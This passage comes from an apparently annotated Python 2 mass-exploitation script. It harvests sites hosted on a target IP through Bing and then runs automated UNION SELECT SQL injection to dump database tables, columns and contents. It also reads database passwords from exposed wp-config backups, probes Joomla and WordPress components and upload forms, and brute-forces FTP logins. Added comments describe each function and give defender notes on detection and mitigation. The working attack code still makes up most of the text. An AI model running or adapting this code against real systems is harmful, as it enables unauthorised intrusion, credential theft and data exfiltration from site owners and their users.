  685. print colors.RED + "| " + str(c) + colors.BLUE + " > " + colors.RED + str(t)
  686. else :
  687. print colors.GREEN + "| " + str(c) + colors.BLUE + " > " + colors.RED+ str(t)
  688. print "+---------------------+"
  689. def showdump():
  690. du = unique(dumps)
  691. print "+---------------------+"
  692. for d in du :
  693. print colors.GREEN + "| " + str(d)
  694. print "+---------------------+"
  695. def unstat(stat): #~ Here We Put Our Union Select Statement
  696. global k
  697. plus = int(stat) + 1
  698. n = range(int(plus))
  699. a = str(n).strip('[]')
  700. b = str(a).strip('0,')
  701. k = b.replace(" ", "")
  702. def grabdata(site,inf,col) :
  703. try :
  704. co = col.replace(str(inf),str(payload_db))
  705. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  706. findu = re.findall('<font color="iheb">(.*?)</font>' , resp1)
  707. for i in range(len(findu)):
  708. db.append(findu[i])
  709. except :
  710. pass
  # Request a UNION SELECT over information_schema.tables for one URL.
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # col is the comma-separated column list built by unstat(). The entry equal
  # to inf is replaced with a group_concat() over table_name, and the result is
  # appended to site as "+union+select+...". Whatever the regex on line 716
  # matches in the response is appended to the global admins list.
  # All exceptions are swallowed.
  # Defender note: "union+select" together with "information_schema.tables" in
  # a request URL is a high-confidence detection pattern. Parameterized queries
  # remove the injection point. A database account limited to the application's
  # own tables narrows what a remaining flaw can read.
  711. def grabtab(site,inf,col):
  712. try :
  713. print colors.CYAN + "|-> Try To get Tables"
  714. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)")
  715. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.tables+where+table_schema=database()--").read()
  716. findu = re.findall('<font color="iheb">(.*?)</font>' , resp1)
  717. for i in range(len(findu)):
  718. admins.append(findu[i])
  719. except :
  720. pass
  721. def grabcol(site,inf,col):
  722. try :
  723. print colors.CYAN + "|-> Try To get columns"
  724. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,column_name,0x3e,table_name,0x3c2f666f6e743e)")
  725. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.columns+where+table_schema=database()--").read()
  726. findu = re.findall('<font color="iheb">(.*?)</font>' , resp1)
  727. for i in range(len(findu)):
  728. columns.append(findu[i])
  729.  
  730. except :
  731. pass
  732. def dumpcol(site,inf,col):
  733. column = raw_input(colors.CYAN + "| Column To dump : ")
  734. need,table = column.split(">")
  735. print colors.CYAN + "|-> Try To Dump Column "
  736. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e," + str(need) + ",0x3c2f666f6e743e)")
  737. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+" + str(table)).read()
  738. findu = re.findall('<font color="Iheb0xx">(.*?)</font>' , resp1)
  739. for i in range(len(findu)):
  740. dumps.append(findu[i])
  741.  
  742. def getsqliinfcol(site,num,col):
  743. try:
  744. i = 1
  745. while i < num :
  746. co = col.replace(str(i),"0x79617373696e6f78")
  747. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  748. fin = re.findall("Iheb",resp1)
  749. if fin :
  750. print colors.GREEN+ "|-> Infected Column > " + str(i)
  751. grabdata(site,i,col)
  752. showdb()
  753. grabtab(site,i,col)
  754. showtb()
  755. grabcol(site,i,col)
  756. showcl()
  757. dumpcol(site,i,col)
  758. showdump()
  759. i = str(num)
  760. i = i + 1
  761. except urllib2.HTTPError, e:
  762. if e.code == 406 :
  763. print colors.RED + "| Got 406"
  764. if e.code == 403 :
  765. print colors.RED + "|- Got 403" #~Incha2allah Bypass in next version
  766. except :
  767. pass
  # Estimate the column count of the injected query with ORDER BY probes.
  # NOTE(review): indentation is lost in this paste, so the exact nesting of
  # the if/else and for blocks is inferred and should be confirmed.
  # Starting at c = 0 and stopping below 25, it requests
  # "<site>+order+by+<n>--" and searches the responses for "SQL" and for the
  # strings in the module-level error list. The count is kept in the global c
  # and passed to unstat(), which builds the column list in the global k.
  # Defender note: a run of requests that differ only in the number after
  # "+order+by+" is an easy log pattern. The probe depends on database error
  # text being returned to the client, so generic error pages blunt it.
  # Parameterized queries remove the flaw.
  768. def getsqlicol(site):
  769. global c
  770. print "|- exploiting Sql Injection "
  771. try :
  772. c = 0
  773. while c < 25 :
  774. response = urllib2.urlopen(site + "+order+by+" + str(c) + "--").read()
  775. sqli = re.findall('SQL',response)
  776. if sqli :
  777. i = False
  778. else :
  779. a = c + 1
  780. response = urllib2.urlopen(site + "+order+by+" + str(a) + "--").read()
  781. for er in error :
  782. sqli = re.findall(er,response)
  783. if sqli :
  784. print colors.GREEN + "|-> Columns Numbers > " + str(c)
  785. num = c
  786. unstat(c)
  787. c = c + 50
  788. break
  789. c = c +1
  790. except :
  791. print colors.RED+ "|- Can't Find Columns number "
  792. pass
  793.  
  794. def exploitsqli() :
  795. sqliss = unique(sqlilist)
  796. for sq in sqliss :
  797. getsqlicol(sq)
  798. getsqliinfcol(sq,c,k)
  799. #-------------------------------------------------
  # Print database passwords found in exposed wp-config backup copies.
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # Each URL stored in wpconfigbak by grabconfigwp() is downloaded again, and
  # every value that follows 'DB_PASSWORD', in the file is printed.
  # All exceptions are swallowed.
  # Defender note: this is the impact of a reachable config backup, because the
  # database password is read straight from the file. If such a file was ever
  # served, rotate the database credentials and the WordPress salts, and check
  # whether the database port accepts connections from outside the host.
  800. def grabpasswords():
  801. try :
  802. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  803. for conf in wpconfigbak :
  804. reads = urllib2.urlopen(conf).read()
  805. password = re.findall("'DB_PASSWORD', '(.*?)'", reads)
  806. for passs in password :
  807. print bcolors.FAIL + "|-> " + str(passs) + " <-|"
  808. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  809. except :
  810. pass
  811. #-------------------------------------------------
  812. def grabuploadedlink():
  813. try :
  814. for upl in upllist :
  815. site = upl.replace("http://","")
  816. site = re.findall("(.*?)/", site)
  817. final = "http://" + site[0] + "/"
  818. for dir in dirs :
  819. currentcode = urllib.urlopen(final + dir).getcode()
  820. if currentcode == 200 :
  821. print bcolors.OKGREEN + "|- Found Directory > " + str(final + dir)
  822. except :
  823. pass
  824. #-------------------------------------------------
  825. def scanjoomla():
  826. try :
  827. print bcolors.OKBLUE + "|- Scanning Joomla From most Known Components"
  828. for jo in jolist :
  829. for link,name in jot.iteritems() :
  830. currentcodetwo = urllib.urlopen(jo + "/" + str(link)).getcode()
  831. if currentcodetwo == 200 :
  832. jocheck = urllib2.urlopen(jo + "/" + str(link)).read()
  833. found = re.findall(str(name), jocheck)
  834. if found :
  835. print bcolors.FAIL + "|-> Found Joomla " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(jo)
  836. except :
  837. pass
  838. #-------------------------------------------------
  839. def check(site):
  840. try :
  841. ur = urllib2.urlopen(site + "/" + com_media_inj).read()
  842. check = re.findall('id="uploadForm" name="uploadForm" method="post" enctype="multipart/form-data">',ur)
  843. if check :
  844. print bcolors.FAIL + "|-> Com Media > " + site
  845. except :
  846. pass
  847. def com_mediascan():
  848. print bcolors.OKBLUE + "|================ Com Media ================| "
  849. for jo in jolist :
  850. check(jo)
  851. print bcolors.OKBLUE + "|================ Com Media ================| "
  852. #-------------------------------------------------
  853. def scanwp():
  854. print bcolors.OKBLUE + "|- Scanning Wordpress From most Known plugins"
  855. for wp in wplist :
  856. for link,name in wpt.iteritems() :
  857. currentcodetwo = urllib.urlopen(wp + "/" + str(link)).getcode()
  858. if currentcodetwo == 200 :
  859. print bcolors.FAIL + "|-> Found Wordpress Plugin " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(wp)
  860. #-------------------------------------------------
  861. def bing_check(ip):
  862. page = 1
  863. lista = []
  864. while page <= 101:
  865. try:
  866. bing = "http://www.bing.com/search?q=ip%3A" + ip + "+*.php&count=50&first=" + str(page)
  867. openbing = urllib2.urlopen(bing)
  868. readbing = openbing.read()
  869. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  870. for i in range(len(findwebs)):
  871. x = findwebs[i]
  872. urls.append(x)
  873. except:
  874. pass
  875.  
  876. page += 50
  877. def scanuplcheck() :
  878. print bcolors.OKBLUE + "|- Ready To check Upload From Crawled Urls"
  879. try :
  880. for url in unique(urls) :
  881. aa =urllib2.urlopen(url).read()
  882. bb = re.findall('type="file"',aa)
  883. if bb :
  884. print bcolors.FAIL + "|-> Upload From Crawl > " + url
  885. except :
  886. pass
  887. def scansqlicheck() :
  888. print bcolors.OKBLUE + "|- Ready To check sqli From Crawled Urls"
  889. try :
  890. for url in unique(urls) :
  891. aa =urllib2.urlopen(url + "'").read()
  892. bb = re.findall('SQL',aa)
  893. if bb :
  894. print bcolors.FAIL + "|-> sql Injection From Crawl > " + url
  895. except :
  896. pass
  # Try one FTP login against ip and print the pair if it is accepted.
  # ftplib.FTP(ip) connects on the default FTP port, and login() raises on a
  # rejected pair. That error and any connection error are swallowed by the
  # bare except.
  # Defender note: attackftp() calls this for every name in cpusers with every
  # entry in passwords, so the signature is a short run of failed FTP logins
  # for real account names from one address. Mitigations are to disable
  # plain FTP in favour of SFTP with keys, and to throttle or ban clients
  # after repeated failures.
  897. def bruteftp(ip,user,password):
  898. try:
  899. ftp = FTP(ip)
  900. ftp.login(user, password)
  901. print (bcolors.OKGREEN + '|-> FTP Attacked with username ' + str(user) + ' And password is ' + str(password))
  902. ftp.quit()
  903. except:
  904. pass
  905. def attackftp(ip) :
  906. try :
  907. print bcolors.OKBLUE + "|- Brute Forcing Ftp "
  908. for user in cpusers :
  909. for password in passwords :
  910. bruteftp(ip,user,password)
  911. except :
  912. pass
  913. #~~~~~~~~~~~~~
  # Run the whole pipeline against one host.
  # The per-target result lists are emptied first, so findings from the
  # previous host do not carry over. The argument is then resolved with
  # socket.gethostbyname(), so a host name and its IP address are treated alike.
  # The stages run in the order written. First comes site collection through
  # Bing "ip:" queries. Next are direct probes of the collected sites for login
  # pages, upload forms, install pages and config backups. Last are password
  # guessing against admin panels, 4images (only when attackfio is True) and
  # FTP.
  # Defender note: the collection stages are invisible to the target. Every
  # later stage uses fixed paths, parameters or form fields that are defined as
  # literals in this file, so they can be matched in web and FTP logs.
  914. def main(ip):
  915. del cpusers[:]
  916. del jolist[:]
  917. del wplist[:]
  918. del adlist[:]
  919. del sqlilist[:]
  920. del upllist[:]
  921. del sites[:]
  922. del jcelist[:]
  923. del urls[:]
  924. del wpconfigbak[:]
  925. ip = socket.gethostbyname(ip)
  926. print bcolors.WARNING + "|-> Target : " + str(ip)
  927. extractserver(ip)
  928. grabwp(ip)
  929. grabjo(ip)
  930. grabins(ip)
  931. admingrabber(ip)
  932. grabadfs()
  933. counta()
  934. grabsqli(ip)
  935. count()
  936. grabupl(ip)
  937. grabuploadedlink()
  938. brutea()
  939. grabcpu(ip)
  940. extractcpu()
  941. extractcpul()
  942. grabfour(ip)
  943. graboc(ip)
  944. if attackfio == True :
  945. attackfi()
  946. grabconfigwp()
  947. grabpasswords()
  948. startjce()
  949. com_mediascan()
  950. scanjoomla()
  951. attackftp(ip)
  952. #~~~~~~~~~~~~~
  # Entry point: ips is the handle opened on "ip.txt" near the top of the file.
  # Each line is stripped of trailing whitespace and passed to main(), one host
  # at a time and in file order. The file handle is never closed.
  953. for ip in ips :
  954. ip = ip.rstrip()
  955. main(ip)
  956. #~~~~~~~~~~~~~